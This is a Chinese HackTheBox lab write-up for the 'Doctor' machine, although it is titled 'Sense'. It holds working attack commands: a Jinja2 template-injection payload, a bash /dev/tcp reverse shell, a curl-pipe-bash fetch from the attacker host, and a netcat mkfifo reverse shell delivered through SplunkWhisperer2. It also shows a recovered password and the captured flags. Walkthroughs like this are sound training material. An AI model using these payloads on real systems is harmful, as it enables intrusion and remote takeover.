Sense-htb-writeup

0x00 靶场技能介绍

章节技能：jinja2模版注入、adm用户组日志查询、PySplunkWhisperer2漏洞利用

参考链接：https://blog.0xzon.dev/2022-03-22-HTB-Doctor/

参考链接：https://cyberkareem.medium.com/hackthebox-doctor-walkthrough-ee3abf80e99

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.209

2、测试下靶机连通率

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.10.209 -c 4
PING 10.10.10.209 (10.10.10.209) 56(84) bytes of data.
64 bytes from 10.10.10.209: icmp_seq=1 ttl=63 time=294 ms
64 bytes from 10.10.10.209: icmp_seq=2 ttl=63 time=279 ms
64 bytes from 10.10.10.209: icmp_seq=3 ttl=63 time=277 ms
64 bytes from 10.10.10.209: icmp_seq=4 ttl=63 time=278 ms

--- 10.10.10.209 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 277.209/281.900/293.508/6.729 ms

3、扫描下开放端口信息

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG braker-allports 10.10.10.209 
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 20:16 CST
Nmap scan report for 10.10.10.209
Host is up (0.28s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8089/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' braker-allports | awk -F/ '{print $1}' | tr '\n' ',' 
22,80,8089,                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,8089 10.10.10.209                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 20:17 CST
Nmap scan report for 10.10.10.209
Host is up (0.61s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Doctor
|_http-server-header: Apache/2.4.41 (Ubuntu)
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.78 seconds

4、查看下80端口网站信息情况

5、这里在首页发现了一个域名信息，把该地址信息，绑定到本地hosts中

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.209 doctors.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.209 doctors.htb

6、通过访问该 doctors.htb 域名信息，发现了一个网站，这里按照提示注册了了个test账号

邮箱：test@qq.com
密码：test

7、使用该账号信息进行登录

8、登录后，发现了一个创建信息的页面功能，这里输入一个XSS尝试下

http://doctors.htb/post/new

9、然而在首页并没有什么想要的显示，根据查看页面源码发现了被一个目录地址

10、到这里可以发现这里应该是存在一个模版注入的漏洞，因为可以看出来这是一个python搭建的网站，且使用了 jinja2 模版

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

11、我们使用上述的里的语句进行尝试下看看，是否有信息显示

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

12、我们在呢个特殊的目录里查看下信息

13、可以看到是成功获取到信息的，那我们就开始构造反弹shell，进行获取第一个初始权限吧

┌──(kali㉿kali)-[~/桌面]
└─$ cat shell.sh                                                
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.2/443 0>&1

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.209 - - [23/Dec/2023 21:18:56] "GET /shell.sh HTTP/1.1" 200 -

# 在页面上输入以下语句
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl 10.10.14.2:8000/shell.sh |bash').read() }}

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.209] 59746
bash: cannot set terminal process group (886): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

14、至此，成功获取到初始的权限。

15、由于我们有 adm 组的权限，我们可以通过这里来获取到一些信息

用户炫耀和挥霍似乎很有趣。groups命令显示当前用户是adm组的成员。此组是用于系统监视任务，并提供对位于/var/log中的日志文件的读取访问权限。日志文件是查找忘记或放错地方的密码的好地方，grep实用程序将派上用场。

web@doctor:~$ grep -R -e 'password' /var/log/
grep -R -e 'password' /var/log/
grep: /var/log/boot.log.2: Permission denied
/var/log/auth.log:Dec 23 14:06:48 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:48 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:49 doctor VGAuth[674]: message repeated 4 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
/var/log/auth.log:Dec 23 14:06:49 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:50 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:53 doctor VGAuth[674]: message repeated 13 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
/var/log/auth.log:Dec 23 14:06:53 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:54 doctor VGAuth[674]: message repeated 7 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
grep: /var/log/boot.log.4: Permission denied
grep: /var/log/speech-dispatcher: Permission denied
grep: /var/log/vmware-network.4.log: Permission denied
/var/log/auth.log.1:Sep 22 13:01:23 doctor sshd[1704]: Failed password for invalid user shaun from 10.10.14.2 port 40896 ssh2
/var/log/auth.log.1:Sep 22 13:01:28 doctor sshd[1704]: Failed password for invalid user shaun from 10.10.14.2 port 40896 ssh2
grep: /var/log/vmware-network.9.log: Permission denied
grep: /var/log/vmware-network.1.log: Permission denied
/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
grep: /var/log/vmware-network.5.log: Permission denied
grep: /var/log/vmware-network.6.log: Permission denied
grep: /var/log/vmware-vmsvc-root.1.log: Permission denied
grep: /var/log/vmware-network.3.log: Permission denied
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1001@8612c285930942bc8295a5e5404c6fb7-000000000000d0e1-0005ae7b997ca2d8.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system@68325fc054024f8aac6fcf2ce991a876-000000000000cf5a-0005ae7b98c1acfe.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system@68325fc054024f8aac6fcf2ce991a876-0000000000003ac7-0005ab70dc697773.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1002@84e1503b20fd49eca2b6ca0b7d6fdeeb-00000000000176d6-0005af5694057aa6.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system@68325fc054024f8aac6fcf2ce991a876-0000000000033c8f-0005afad8045c159.journal matches
grep: /var/log/boot.log: Permission denied
grep: /var/log/vmware-vmtoolsd-root.log: Permission denied
grep: /var/log/btmp: Permission denied
grep: /var/log/vmware-network.7.log: Permission denied
grep: /var/log/btmp.1: Permission denied
grep: /var/log/boot.log.3: Permission denied
grep: /var/log/vmware-vmsvc-root.3.log: Permission denied
grep: /var/log/vmware-network.2.log: Permission denied
grep: /var/log/boot.log.7: Permission denied
grep: /var/log/boot.log.6: Permission denied
grep: /var/log/boot.log.1: Permission denied
grep: /var/log/vmware-vmsvc-root.log: Permission denied
grep: /var/log/vmware-network.8.log: Permission denied
grep: /var/log/private: Permission denied
grep: /var/log/vmware-vmsvc-root.2.log: Permission denied
grep: /var/log/boot.log.5: Permission denied
grep: /var/log/vmware-network.log: Permission denied
web@doctor:~$ 

/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

16、我们在上述，发现了1个密码信息 shaun:Guitar123

17、而通过这个密码信息，成功的获取到第一个flag信息

web@doctor:~$ su shaun
su shaun
Password: Guitar123
id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
python3 -c 'import pty;pty.spawn("/bin/bash")'
shaun@doctor:/home/web$ cd ~
cd ~
shaun@doctor:~$ ls
ls
user.txt
shaun@doctor:~$ cat user.txt
cat user.txt
570876d87ef81abd010b0d3378ddeba3
shaun@doctor:~$ 

0x02 系统权限获取

18、通过查看 sudo -l ，我们并没有什么发现

shaun@doctor:~$ sudo -l
sudo -l
[sudo] password for shaun: Guitar123

Sorry, user shaun may not run sudo on doctor.

19、其实这里结合上面最一开始发现的 8089 端口 Splunkd 的信息，我们这里的这思路也是从这里开始的，这里参看演示报告的提示

https://airman604.medium.com/splunk-universal-forwarder-hijacking-5899c3e0e6b2

回想我们最初的枚举，Splunk转发器实例正在8089端口上运行。

在线搜索关键词splunk通用货代漏洞揭示了这篇文章，

详细说明了使用Splunk Whisperer2以获得一个shell作为超级用户帐户。

这是因为Splunk通用转发器包括一个管理服务

监听端口8089，默认情况下允许远程连接。管理服务可以是

用于通过向通用转发器代理发送单个命令或脚本

Splunk API和UF代理不会验证接收到的连接是否来自有效的

Splunk Enterprise服务器，UF代理也不会验证代码是否已签名或以其他方式证明

来自Splunk Enterprise服务器。

该漏洞利用假定Splunk通用转发器正在根目录的上下文中运行。让我们

对此进行验证。

20、我们查看进程情况

shaun@doctor:~$ ps -aux | grep splunk
ps -aux | grep splunk
root        1136  0.1  2.1 257468 86140 ?        Sl   14:06   0:02 splunkd -p 8089 start
root        1138  0.0  0.3  77664 13408 ?        Ss   14:06   0:00 [splunkd pid=1136] splunkd -p 8089 start [process-runner]
shaun       1819  0.0  0.0  17668   732 pts/0    R+   14:32   0:00 grep --color=auto splunk
shaun@doctor:~$ 

21、到这里，也就明确了，这里需要使用 PySplunkWhisperer2 的相关漏洞来提权

https://github.com/cnotin/SplunkWhisperer2

22、接下来，本地尝试构造尝试下

┌──(kali㉿kali)-[~/桌面]
└─$ git clone https://github.com/cnotin/SplunkWhisperer2
正克隆到 'SplunkWhisperer2'...
remote: Enumerating objects: 77, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 77 (delta 10), reused 13 (delta 9), pack-reused 54
接收对象中: 100% (77/77), 25.45 KiB | 248.00 KiB/s, 完成.
处理 delta 中: 100% (29/29), 完成.
  
┌──(kali㉿kali)-[~/桌面]
└─$ cd SplunkWhisperer2/PySplunkWhisperer2

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --username shaun --password Guitar123 --payload id

┌──(kali㉿kali)-[~/桌面/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --username shaun --password Guitar123 --payload id
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpumpvcaia.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.2:8181/
10.10.10.209 - - [23/Dec/2023 21:40:27] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup
[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

23、思路是没问题的，这里直接开始尝试利用下吧

┌──(kali㉿kali)-[~/桌面/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --username shaun --password Guitar123 --lhost 10.10.14.2 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 10086 >/tmp/f'
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp8dt_f0ce.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.2:8181/
10.10.10.209 - - [23/Dec/2023 21:42:18] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

24、我通过监听的端口，也就成功获取到最终的root权限了

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.209] 57194
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
4f44afffce27dd002fb36bffbc71c7df
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/278